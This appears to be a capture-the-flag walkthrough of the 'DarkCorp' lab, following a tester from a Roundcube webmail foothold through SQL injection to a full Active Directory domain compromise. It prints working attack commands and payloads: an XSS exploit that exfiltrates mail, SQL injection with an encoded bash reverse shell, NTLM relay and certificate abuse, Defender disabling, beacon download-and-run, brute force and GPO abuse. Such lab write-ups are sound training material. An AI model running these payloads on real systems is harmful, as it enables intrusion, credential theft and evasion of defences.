DarkCorp
Detailed Walkthrough
Initial foothold
Upon establishing a connection to the VPN, the tester initiated the assessment by performing a service enumeration. This process revealed and HTTP service running on 80/TCP port, which is redirected to drip.htb .
Additionally, The ffuf tool was executed which successfully discovered a subdomain associated with the host.
❯ ffuf -c -u 'http://drip.htb/' -H 'Host: FUZZ.drip.htb' -w /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt -t 500 -fs 64
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://drip.htb/
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
:: Header : Host: FUZZ.drip.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 500
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 64
________________________________________________
mail [Status: 200, Size: 5323, Words: 366, Lines: 97, Duration: 128ms]Adding the subdomain mail.drip.htb to the hosts file and navigated to it, it was discovered an RoundCube instance running under the subdomain.
The tester created a new user account and successfully authenticated to the Dripmail application.
Once authenticated, it was identified drip.darkcorp.htb as an additional subdomain, an email account support@drip.htb, Roundcube version 1.6.7, and confirmed the presence of two Roundcube plugins: filesystem_attachments and jqueryui installed on the application.
Contact Form Misconfiguration
Further enumeration on http://drip.htb revealed a /contact endpoint that was improperly misconfigured. The tester intercepted requests using Burp Suite and confirmed that the recipient parameter is fully user-controllable, allowing messages to be sent to arbitrary addresses without proper validation.
POST /contact HTTP/1.1
Host: drip.htb
Content-Length: 106
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://drip.htb
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://drip.htb/index
Accept-Encoding: gzip, deflate, br
Cookie: session=eyJfZnJlc2giOmZhbHNlLCJjc3JmX3Rva2VuIjoiYzY4ZGQwZDM5MTY0OWQzOWFjYTZiZjUxNjJmMTQ0YTc4ODY4NWI5MSJ9.aNIOoA.rBpMe5_fR6NjC53X4Z67HgbWsqI
Connection: keep-alive
name=Intrusionz3r0&email=tester%40drip.htb&message=this+is+a+text&content=text&recipient=tester%40drip.htbTo confirm this behavior, the tester sent a post request to /contact to the account previously created as recipient and retrieved a confidential note which revealed a new user account bcase@drip.htb.
Stored Cross-Site Scripting (XSS) in Roundcube Webmail
Later during the enumeration phase, a stored cross-site scripting (XSS) vulnerability was discovered in the Roundcube webmail instance, affecting version 1.6.7. This vulnerability allows an attacker to inject a malicious payload into the webmail system, which is triggered when the target opens the affected email, resulting in the exfiltration of the entire webmail content.
Using this information, it was downloaded the exploit associated to the vulnerability CVE-2024-42009 and executed. Which successfully exfiltrated private emails for bcase@drip.htb
and revealed a new subdomain, dev-a3f1-01.drip.htb, exposing additional avenues for further exploitation.
❯ python3 exploit.py -u 'http://drip.htb/contact' -r bcase@drip.htb -l 10.10.15.44 -p 1234
[*] Crafting payload for http://drip.htb/contact with recipient bcase@drip.htb
[*] Sending payload to http://drip.htb/contact with recipient bcase@drip.htb
[*] Starting HTTP server on port 1234
[+] HTTP server listening on port 1234
[*] Waiting for emails... (Press Ctrl+C to stop manually)
[*] POST request to: /?emails=found
[+] Received 3 emails!
<SNIF>
------------------------------------------------------------
📧 EMAIL UID: 2
------------------------------------------------------------
From: ebelford
Subject: Analytics Dashboard
Message:
Hey Bryce,
The Analytics dashboard is now live. While it's still in development and limited in functionality, it should provide a good starting point for gathering metadata on the users currently using our service.
You can access the dashboard at dev-a3f1-01.drip.htb. Please note that you'll need to reset your password before logging in.
If you encounter any issues or have feedback, let me know so I can address them promptly.
Thanks
------------------------------------------------------------
<SNIF>
[+] Email exfiltration complete! Shutting down server...
[*] Shutting down server...
[+] Server stopped successfully!Abusing the Forgot Password funcionality and CVE-2024-42009
While navigating dev-a3f1-01.drip.htb, a password-reset function was identified and chained with the Roundcube stored XSS (CVE-2024-42009), allowing the bcase@drip.htb password to be reset.
❯ python3 exploit.py -u 'http://drip.htb/contact' -r bcase@drip.htb -l 10.10.15.44 -p 1234
[*] Crafting payload for http://drip.htb/contact with recipient bcase@drip.htb
[*] Sending payload to http://drip.htb/contact with recipient bcase@drip.htb
[*] Starting HTTP server on port 1234
[+] HTTP server listening on port 1234
[*] Waiting for emails... (Press Ctrl+C to stop manually)
[*] POST request to: /?emails=found
[+] Received 5 emails!
------------------------------------------------------------
📧 EMAIL UID: 3
------------------------------------------------------------
From: no-reply@drip.htb
Subject: Reset token
Message:
Your reset token has generated. Please reset your password within the next 5 minutes.
You may reset your password here:
http://dev-a3f1-01.drip.htb/reset/ImJjYXNlQGRyaXAuaHRiIg.aNIXDg.-Kph-5JxQrB9c4a6EwXoD262JD0
------------------------------------------------------------
[+] Email exfiltration complete! Shutting down server...
[*] Shutting down server...
[+] Server stopped successfully!Using the credentials, the tester successfully authenticated on dev-a3f1-01.drip.htb.
Discovering SQL vulnerability
During assessment of dev-a3f1-01.drip.htb, it was identified a SQL injection vulnerability associated to Psycopg2 within the query (search) parameter along with a web application firewall (WAF) implemented.
Exploiting SQLi Injection
To bypass the WAF and gain access to the system, the tester crafted an obfuscated payload and sent it, resulting in the compromise of the server.
#WAF bypass using Replace
query=''; DO $$ DECLARE c TEXT; BEGIN
c := REPLACE('C'||'O'||'P'||'Y', 'X', '') || ' (SELECT '''') ' ||
REPLACE('T'||'O', 'X', '') || ' ' ||
REPLACE('P'||'R'||'O'||'G'||'R'||'A'||'M', 'X', '') || ' ''echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjEwLjE1LjQ0LzEyMzQgMD4mMQ==|base64 -d|bash''';
EXECUTE c;
END $$;
#WAF bypass using CHR()
query=''; DO $$
DECLARE
comando TEXT;
BEGIN
comando := CHR(67)||CHR(79)||CHR(80)||CHR(89) || ' (SELECT '''') ' || CHR(84)||CHR(79) || ' ' || CHR(80)||CHR(82)||CHR(79)||CHR(71)||CHR(82)||CHR(65)||CHR(77) || '''curl 10.10.15.44''';
EXECUTE comando;
END $$;
#WAF bypass using Hex String
query=''; DO $$ DECLARE c TEXT; BEGIN
c := CONVERT_FROM('\x434f5059', 'UTF8') || ' (SELECT '''') ' ||
CONVERT_FROM('\x544f', 'UTF8') || ' ' ||
CONVERT_FROM('\x50524f4752414d', 'UTF8') || ' ''curl 10.10.15.44''';
EXECUTE c;
END $$;
Access internal Network
Decrypting GPG files
During server enumeration, it was a retrieved the application configuration file containing database credentials for the dripmail_dba account:
# excerpt from environment configuration
DB_ENGINE=postgresql
DB_HOST=localhost
DB_NAME=dripmail
DB_USERNAME=dripmail_dba
DB_PASS=<SNIF>
SQLALCHEMY_DATABASE_URI='postgresql://dripmail_dba:<SNIF>@localhost/dripmail'
MAIL_DEFAULT_SENDER='support@drip.htb'Along with a SQL database dump located at /var/backups/postgres/dev-dripmail.old.sql.gpg and GPG keys for the postgres user.
postgres@drip:/var/backups/postgres$ ls
dev-dripmail.old.sql.gpg
postgres@drip:/var/backups/postgres$ gpg --list-keys
/var/lib/postgresql/.gnupg/pubring.kbx
--------------------------------------
pub rsa3072 2025-01-08 [SC] [expires: 2027-01-08]
3AA1F620319ABF74EF5179C0F426B2D867825D9F
uid [ultimate] postgres <postgres@drip.darkcorp.htb>
sub rsa3072 2025-01-08 [E] [expires: 2027-01-08]The tester used the credentials obtained from the environment file to successfully decrypt the backup:
postgres@drip:/var/lib/postgresql/.gnupg$ gpg --batch --yes --passphrase '<SNIF>' --pinentry-mode loopback --decrypt /var/backups/postgres/dev-dripmail.old.sql.gpg > /dev/shm/decrypt_backup
gpg: encrypted with 3072-bit RSA key, ID 1112336661D8BC1F, created 2025-01-08
"postgres <postgres@drip.darkcorp.htb>"The decrypted backup contained sensitive application data, including entries from the Admins table. Several credential hashes were extracted from the dump and subsequently cracked using hashcat, retrieving plaintext credentials for multiple users.
postgres@drip:/var/lib/postgresql/.gnupg$ cat
postgres@drip:/dev/shm$ cat decrypt_backup
<SNIF>
COPY public."Admins" (id, username, password, email) FROM stdin;
1 bcase dc548xxxxxxxxxxxxxxxxxxxxxe7225 bcase@drip.htb
2 victor.r cac1c7xxxxxxxxxxxxxxxxxxxxx6b9c0 victor.r@drip.htb
3 ebelford 8bbd7xxxxxxxxxxxxxxxx69be86 ebelford@drip.htb
<SNIF>Credentials found:
victor.r:<SNIF>
ebelford::<SNIF>
Setting up tunneling with sshuttle
After obtaining ebelford’s credentials, it was discovered an internal network route for 172.16.20.0/24.
ebelford@drip:/dev/shm/.Intrusionz3r0$ route -4
Kernel IP routing table
Destination Gateway Genmask Flags Metric Ref Use Iface
default DC-01 0.0.0.0 UG 0 0 0 eth0
172.16.20.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0A quick ping sweep confirmed multiple live hosts on the subnet, indicating an internal networ worth pivoting into.
ebelford@drip:/dev/shm/.Intrusionz3r0$ for i in {1..254} ;do (ping -c 1 172.16.20.$i | grep "bytes from" &) ;done
64 bytes from 172.16.20.1: icmp_seq=1 ttl=128 time=1.93 ms
64 bytes from 172.16.20.2: icmp_seq=1 ttl=128 time=2.82 ms
64 bytes from 172.16.20.3: icmp_seq=1 ttl=64 time=0.027 msTo access to the internal network from the tester’s machine, the tester established a SSH-based tunnel using sshuttle:
❯ sudo sshuttle -r ebelford@10.10.11.54 172.16.20.0/24 -v
Starting sshuttle proxy (version 1.3.2).
Connecting to server...
The authenticity of host '10.10.11.54 (10.10.11.54)' can't be established.
ED25519 key fingerprint is SHA256:JNw/rUlpDzlUEzvKKKFQ/M4prRH35ZhHammHWv47SkY.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.54' (ED25519) to the list of known hosts.
ebelford@10.10.11.54's password:
s: Running server on remote host with /usr/bin/python3 (version 3.11.2)
s: latency control setting = True
s: auto-nets:False
c : Connected to server.
fw: setting up.
fw: ip6tables -w -t nat -N sshuttle-12300
fw: ip6tables -w -t nat -F sshuttle-12300
fw: ip6tables -w -t nat -I OUTPUT 1 -j sshuttle-12300
fw: ip6tables -w -t nat -I PREROUTING 1 -j sshuttle-12300
fw: ip6tables -w -t nat -A sshuttle-12300 -j RETURN --dest ::1/128 -p tcp
fw: ip6tables -w -t nat -A sshuttle-12300 -j RETURN -m addrtype --dst-type LOCAL
fw: iptables -w -t nat -N sshuttle-12300
fw: iptables -w -t nat -F sshuttle-12300
fw: iptables -w -t nat -I OUTPUT 1 -j sshuttle-12300
fw: iptables -w -t nat -I PREROUTING 1 -j sshuttle-12300
fw: iptables -w -t nat -A sshuttle-12300 -j RETURN --dest 127.0.0.1/32 -p tcp
fw: iptables -w -t nat -A sshuttle-12300 -j REDIRECT --dest 172.16.20.0/24 -p tcp --to-ports 12300
fw: iptables -w -t nat -A sshuttle-12300 -j RETURN -m addrtype --dst-type LOCALCompromise WEB-01
Once the tunnel was established, Internal Active Directory enumeration was performed to map domain objects and identify escalation paths. The tester used dnschef to spoof internal DNS responses and bloodhound-python to collect LDAP data and build an attack graph, which revealed domain users, groups, GPOs and computers for further analysis.
❯ dnschef --fakeip 172.16.20.1 --fakedomains darkcorp.htb
❯ bloodhound-python -c all -u 'victor.r' -p '<SNIF>' -d darkcorp.htb -dc DC-01.darkcorp.htb -ns 127.0.0.1 --disable-pooling -w 1 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
WARNING: Could not find a global catalog server, assuming the primary DC has this role
If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc
INFO: Getting TGT for user
INFO: Connecting to LDAP server: DC-01.darkcorp.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 3 computers
INFO: Connecting to LDAP server: DC-01.darkcorp.htb
INFO: Found 13 users
INFO: Found 54 groups
INFO: Found 3 gpos
INFO: Found 4 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 1 workers
INFO: Querying computer: WEB-01.darkcorp.htb
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
WARNING: DCE/RPC connection failed: [Errno Connection error (172.16.20.1:445)] timed out
INFO: Ignoring host WEB-01.darkcorp.htb since its hostname does not match: Supplied hostname web-01.darkcorp.htb does not match reported hostnames dc-01 or dc-01.darkcorp.htb
INFO: Querying computer: drip.darkcorp.htb
INFO: Ignoring host drip.darkcorp.htb since its hostname does not match: Supplied hostname drip.darkcorp.htb does not match reported hostnames dc-01 or dc-01.darkcorp.htb
INFO: Querying computer: DC-01.darkcorp.htb
INFO: Done in 01M 22S
INFO: Compressing output into 20250923151538_bloodhound.zipExecuting Certipy
Additionally, certipy-ad was used to enumerated Certificate Authority configuration which identified a potential ESC8-related vulnerability on DARKCORP-DC-01-CA.
❯ certipy-ad find -u 'victor.r' -p '<SNIF>' -dc-host DC-01.darkcorp.htb -dc-ip 172.16.20.1 -vulnerable -stdout
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'DARKCORP-DC-01-CA' via RRP
[*] Successfully retrieved CA configuration for 'DARKCORP-DC-01-CA'
[*] Checking web enrollment for CA 'DARKCORP-DC-01-CA' @ 'DC-01.darkcorp.htb'
[!] Failed to check channel binding: NTLM not supported. Try using Kerberos authentication (-k and -dc-host).
[*] Enumeration output:
Certificate Authorities
0
CA Name : DARKCORP-DC-01-CA
DNS Name : DC-01.darkcorp.htb
Certificate Subject : CN=DARKCORP-DC-01-CA, DC=darkcorp, DC=htb
Certificate Serial Number : 27637AF630C1D39945283AF47C89040C
Certificate Validity Start : 2024-12-29 23:24:10+00:00
Certificate Validity End : 2125-01-22 12:18:28+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : True
Channel Binding (EPA) : Unknown
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : DARKCORP.HTB\Administrators
Access Rights
ManageCa : DARKCORP.HTB\Administrators
DARKCORP.HTB\Domain Admins
DARKCORP.HTB\Enterprise Admins
ManageCertificates : DARKCORP.HTB\Administrators
DARKCORP.HTB\Domain Admins
DARKCORP.HTB\Enterprise Admins
Enroll : DARKCORP.HTB\Authenticated Users
[*] Remarks
ESC8 : Channel Binding couldn't be verified for HTTPS Web Enrollment. For manual verification, request a certificate via HTTPS with Channel Binding disabled and observe if the request succeeds or is rejected.
Certificate Templates : [!] Could not find any certificate templatesNTLM relay, reverse tunnelling & ESC8 abuse
During internal enumeration, it was also identified that WEB-01 (172.16.20.2) was susceptible to NTLM relay attacks because SMB signing was not enforced.
❯ nxc smb 172.16.20.2 -u 'victor.r' -p '<SNIF>' -M coerce_plus
SMB 172.16.20.2 445 WEB-01 [*] Windows Server 2022 Build 20348 x64 (name:WEB-01) (domain:darkcorp.htb) (signing:False) (SMBv1:False)
SMB 172.16.20.2 445 WEB-01 [+] darkcorp.htb\victor.r:<SNIF>
COERCE_PLUS 172.16.20.2 445 WEB-01 VULNERABLE, PetitPotam
COERCE_PLUS 172.16.20.2 445 WEB-01 VULNERABLE, PrinterBug
COERCE_PLUS 172.16.20.2 445 WEB-01 VULNERABLE, PrinterBug
COERCE_PLUS 172.16.20.2 445 WEB-01 VULNERABLE, MSEvenAn attempt to add a DNS record directly via LDAP (to support ESC8) failed due to insufficient privileges for victor.r:
❯ bloodyAD -k --host DC-01.darkcorp.htb -d darkcorp.htb -u victor.r -p '<SNIF>' add dnsRecord 'DC-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.15.44
Traceback (most recent call last):
File "/usr/bin/bloodyAD", line 8, in <module>
sys.exit(main())
~~~~^^
File "/usr/lib/python3/dist-packages/bloodyAD/main.py", line 201, in main
output = args.func(conn, **params)
File "/usr/lib/python3/dist-packages/bloodyAD/cli_modules/add.py", line 185, in dnsRecord
conn.ldap.bloodyadd(record_dn, attributes=record_attr)
~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/bloodyAD/network/ldap.py", line 192, in bloodyadd
raise err
msldap.commons.exceptions.LDAPAddException: LDAP Add operation failed on DN DC=DC-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA,DC=darkcorp.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=darkcorp,DC=htb! Result code: "insufficientAccessRights" Reason: "b'00000005: SecErr: DSID-03152E29, problem 4003 (INSUFF_ACCESS_RIGHTS), data 0\n\x00'"The 172.16.20.2 server was running an application on WEB-01 which apparently made a HTTP authentication that could be used to relay an HTTP authentication to DC-01 via ntlmrelayx tool to create the fake DNS and abuse of ESC8 by requesting a Machine certificate to finally request a Service Ticket as Administrator and compromise the WEB-01.
Setting an Reverse PortForwarding
To abuse the NTLM relay authentication, the tester had to set up an Reverse Port Forwarding using chisel to redirect all the incoming connections from drip.dark.htb to tester's machine which in turn relay the authentication to add the fake DNS.
❯ Intrusionz3r0@kali:$ ./chisel_1.10.1_linux_amd64 server -port 1234 --reverse
❯ ebelford@drip:/dev/shm$ ./chisel client 10.10.15.44:1234 -v 8080:0.0.0.0:80 Once configuration was completed, the tester proceeded to run impacket-ntlmrelayx and perform the authentication request by triggering through Real Time Status Monitor application, successfully adding the fake domain.
❯ impacket-ntlmrelayx -t "ldap://172.16.20.1" --add-dns-record 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.15.44
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Protocol Client HTTPS loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled
[*] Servers started, waiting for connections
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Connection from 127.0.0.1 controlled, attacking target ldap://172.16.20.1
[*] HTTPD(80): Client requested path: /
[*] HTTPD(80): Authenticating against ldap://172.16.20.1 as DARKCORP/SVC_ACC SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Checking if domain already has a `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` DNS record
[*] Domain does not have a `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` record!
[*] Adding `A` record `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA` pointing to `10.10.15.44` at `DC=dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA,DC=darkcorp.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=darkcorp,DC=htb`
[*] Added `A` record `dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA`. DON'T FORGET TO CLEANUP (set `dNSTombstoned` to `TRUE`, set `dnsRecord` to a NULL byte)
[*] Dumping domain info for first time
[*] Domain info dumped into lootdir!Abusing ESC8
After the DNS record was added, it was utilized krbrelayx and PetitPotam to coerce the authentication and abuse of ESC8 to generate a WEB-01 machine certificate.
❯ python3 krbrelayx.py -t 'https://DC-01.darkcorp.htb/certsrv/certfnsh.asp' --adcs --template 'Machine' -v 'WEB-01' -dc-ip 172.16.20.1
❯ python3 PetitPotam.py -u victor.r -p '<SNIF>' -d darkcorp.htb 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 172.16.20.2
/home/Intrusionz3r0/Documents/Tools/krbrelayx/env/lib/python3.13/site-packages/impacket/examples/ntlmrelayx/attacks/__init__.py:20: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
import pkg_resources
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client SMB loaded..
[*] Running in attack mode to single host
[*] Running in kerberos relay mode because no credentials were specified.
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up DNS Server
[*] Servers started, waiting for connections
[*] SMBD: Received connection from 10.10.11.54
[*] HTTP server returned status code 200, treating as a successful login
[*] SMBD: Received connection from 10.10.11.54
[*] HTTP server returned status code 200, treating as a successful login
[*] Generating CSR...
[*] CSR generated!
[*] Getting certificate...
[*] Skipping user WEB-01 since attack was already performed
[*] GOT CERTIFICATE! ID 6
[*] Writing PKCS#12 certificate to ./WEB-01.pfx
[*] Certificate successfully written to fileUsing certipy-ad tool, it was possible to extracted the web-01$ NTLM hash computer account.
❯ certipy-ad auth -pfx WEB-01.pfx -dc-ip 172.16.20.1 -username 'web-01$'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN DNS Host Name: 'WEB-01.darkcorp.htb'
[*] Security Extension SID: 'S-1-5-21-3432610366-2163336488-3604236847-20601'
[*] Using principal: 'web-01$@darkcorp.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'web-01.ccache'
[*] Wrote credential cache to 'web-01.ccache'
[*] Trying to retrieve NT hash for 'web-01$'
[*] Got hash for 'web-01$@darkcorp.htb': aad3b435b51404eeaad3b435b51404ee:8f33cxxxxxxxxxxxxxxxxxxxxxfbb8b675Requesting Ticket Service as administrator on WEB
By utilizing the web-01$ computer account, the tester request a TGT using S4u2self to impersonate administrator and generate a TGS for CIFS service and compromise the server via impacket-wmiexec.
❯ impacket-getST -self -impersonate Administrator -altservice CIFS/WEB-01.darkcorp.htb darkcorp.htb/web-01$ -hashes :8f33cxxxxxxxxxxxxxxxxxxxxxfbb8b675
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Changing service from web-01$@DARKCORP.HTB to CIFS/WEB-01.darkcorp.htb@DARKCORP.HTB
[*] Saving ticket in Administrator@CIFS_WEB-01.darkcorp.htb@DARKCORP.HTB.ccache❯ export KRB5CCNAME=Administrator@CIFS_WEB-01.darkcorp.htb@DARKCORP.HTB.ccache
❯ impacket-wmiexec -k -no-pass WEB-01.darkcorp.htb -shell-type powershell
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
PS C:\> PS c:\Temp> cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -removedefinitions -all
Service Version: 4.18.24090.11
Engine Version: 1.1.24090.11
AntiSpyware Signature Version: 1.421.1388.0
AntiVirus Signature Version: 1.421.1388.0
Starting engine and signature rollback to none...
Done!
PS c:\Temp> Set-MpPreference -DisableRealtimeMonitoring $true -DisableScriptScanning $true -DisableBehaviorMonitoring $true -DisableIOAVProtection $true -DisableIntrusionPreventionSystem $true
PS C:\Temp> IWR -URI http://10.10.15.44:8081/beacon_x64.exe -Outfile beacon_x64.exe
PS C:\Temp> .\beacon_x64.exe
Compromise domain controller
By reviewing the BloodHound output, it was identified that the user taylor.b.adm was a member of GPO_manager. That group had delegated permissions (WriteOwner, GenericWrite, WriteDacl) over the SECURITYUPDATES GPO. These privileges created a plausible path to escalate privileges by modifying the GPO to execute code on domaim controller.
Extracted administrator credentials
With no leads on how to compromise taylor.b.adm, the tester performed a brute‑force attack against the account using kerbrute.
❯ ~/Documents/Tools/kerbrute/kerbrute bruteuser -d darkcorp.htb --dc 172.16.20.1 /usr/share/wordlists/rockyou.txt' taylor.b.adm' -t 250 -v
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 09/25/25 - Ronnie Flathers @ropnop
2025/09/25 19:42:51 > Using KDC(s):
2025/09/25 19:42:51 > 172.16.20.1:88
<SNIF>
2025/09/25 19:42:56 > [+] VALID LOGIN: taylor.b.adm@darkcorp.htb:<SNIF>
<SNIF>Bypassing AV
After authenticating as taylor.b.adm, the presence of antivirus software on the system was identified. To bypass it, a loader was crafted in C++ using a combination of techniques, including Early Bird Injection, Function Call Obfuscation, Sandbox Evasion, and shellcode encryption.
*Evil-WinRM* PS C:\Users\taylor.b.adm\Documents> IWR -URI http://10.10.15.44:8081/Intrusionz3r0.exe -Outfile Intrusionz3r0.exe
*Evil-WinRM* PS C:\Users\taylor.b.adm\Documents> .\Intrusionz3r0.exe
Based on discovered GPO privileges and acquired credentials, SharpGPOAbuse was used to add a computer scheduled task to the SECURITYUPDATES GPO, which in turn executed a custom Cobalt Strike beacon, resulting in the compromise of the domain controller.
[09/25 20:19:56] beacon> execute-assembly /home/Intrusionz3r0/Documents/Tools/SharpCollection/NetFramework_4.7_x64/SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --GPOName "SECURITYUPDATES" --Author darkcorp\Administrator --Command "C:\Temp\Intrusionz3r0.exe" --Arguments "C:\Temp\payload_x64.bin.rc4.enc"
[09/25 20:19:56] [*] Tasked beacon to run .NET program: SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --GPOName "SECURITYUPDATES" --Author darkcorp\Administrator --Command "C:\Temp\Intrusionz3r0.exe" --Arguments "C:\Temp\payload_x64.bin.rc4.enc"
[09/25 20:19:57] [+] host called home, sent: 180264 bytes
[09/25 20:19:58] [+] received output:
[+] Domain = darkcorp.htb
[+] Domain Controller = DC-01.darkcorp.htb
[+] Distinguished Name = CN=Policies,CN=System,DC=darkcorp,DC=htb
[+] GUID of "SECURITYUPDATES" is: {652CAE9A-4BB7-49F2-9E52-3361F33CE786}
[+] Creating file \\darkcorp.htb\SysVol\darkcorp.htb\Policies\{652CAE9A-4BB7-49F2-9E52-3361F33CE786}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[09/25 20:19:58] [+] received output:
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
[09/25 20:20:12] beacon> shell gpupdate /force
[09/25 20:20:12] [*] Tasked beacon to run: gpupdate /force
[09/25 20:20:12] [+] host called home, sent: 46 bytes
[09/25 20:20:25] [+] received output:
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.
Credentials
tester
<SNIF>
User registration
DripMail webmail
dripmail_dba
<SNIF>
SQLi
postgresql
victor.r
<SNIF>
PostgreSQL backup
ebelford
<SNIF>
PostgreSQL backup
DRIP Local User (SSH)
taylor.b.adm
<SNIF>
Brute Force
GPO_Mananger
👤 Users wordlist
Administrator
dripmail_dba
victor.r
svc_acc
john.w
angela.w
angela.w.adm
taylor.b
taylor.b.adm
eugene.b
bryce.c🔑 Password wordlist
<SNIF>
<SNIF>
<SNIF>
<SNIF>
<SNIF>Subdomains / Hosts
drip.htb
10.10.11.54
nmap scan.
mail.drip.htb
10.10.11.54
Discovered via VHost enumeration
drip.darkcorp.htb
10.10.11.54
Extracted from Message headers
DC-01.darkcorp.htb
172.16.20.1
Domain Controller
Host Discovered
drip
10.10.11.54
DC-01
172.16.20.1
WEB-01
172.16.20.2
Scans
# Nmap 7.95 scan initiated Fri Sep 12 23:35:19 2025 as: /usr/lib/nmap/nmap -p- --open -T5 -Pn -n -A -oN 10.10.11.54_tcp_allports -vvv 10.10.11.54
Nmap scan report for 10.10.11.54
Host is up, received user-set (0.076s latency).
Scanned at 2025-09-12 23:35:19 EDT for 155s
Not shown: 65533 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 127 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
| 256 33:41:ed:0a:a5:1a:86:d0:cc:2a:a6:2b:8d:8d:b2:ad (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPM91a70VJCxg10WFerhkQv207077raOCX9rTMPBeEbHqGHO954XaFtpqjoofHOQWi2syh7IoOV5+APBOoJ60k0=
